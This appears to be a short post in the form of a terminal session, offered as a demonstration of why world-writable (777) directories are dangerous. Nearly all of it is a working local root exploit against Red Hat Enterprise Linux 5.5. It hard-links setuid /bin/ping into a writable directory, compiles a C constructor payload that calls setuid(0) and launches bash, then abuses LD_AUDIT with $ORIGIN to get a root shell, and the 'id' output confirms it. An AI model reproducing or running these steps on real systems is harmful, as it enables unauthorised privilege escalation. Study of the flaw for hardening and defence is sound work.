# Why do 777 dir are simply BAD ?
# check it out...

[HiddenHost/]$ find / -xdev -type d -perm -o+w
/tmp
/nsr/dedup
/nsr/dedup/cache
/nsr/dedup/logs
/nsr/applogs
/etc/nginx/run
[HiddenHost /]$ ls -al /nsr/dedup
total 16
drwxrwxrwx  4 root root 4096 Oct  5  2009 .
drwxr-xr-x 13 root root 4096 Oct  5  2009 ..
drwxrwxrwx  2 root root 4096 Oct  5  2009 cache
drwxrwxrwx  2 root root 4096 Oct  5  2009 logs
[HiddenHost /]$ cd /nsr/applogs/
[HiddenHost applogs]$ which ping
/bin/ping
[HiddenHost applogs]$ ls -al /bin/ping
-rwsr-xr-x 1 root root 37312 Apr 24  2009 /bin/ping
[HiddenHost applogs]$ mkdir exploit
[HiddenHost applogs]$ ln /bin/ping /nsr/applogs/exploit/target
[HiddenHost applogs]$ exec 3< /nsr/applogs/exploit/target
[HiddenHost applogs]$ rm -rf /nsr/applogs/exploit/
[HiddenHost applogs]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[HiddenHost applogs]$ gcc -w -fPIC -shared -o ./exploit payload.c 
[HiddenHost applogs]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[HiddenHost applogs]# id
uid=0(root) gid=4030(ucc) groups=4030(ucc)
[HiddenHost applogs]# cat /etc/redhat-release 
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[HiddenHost applogs]#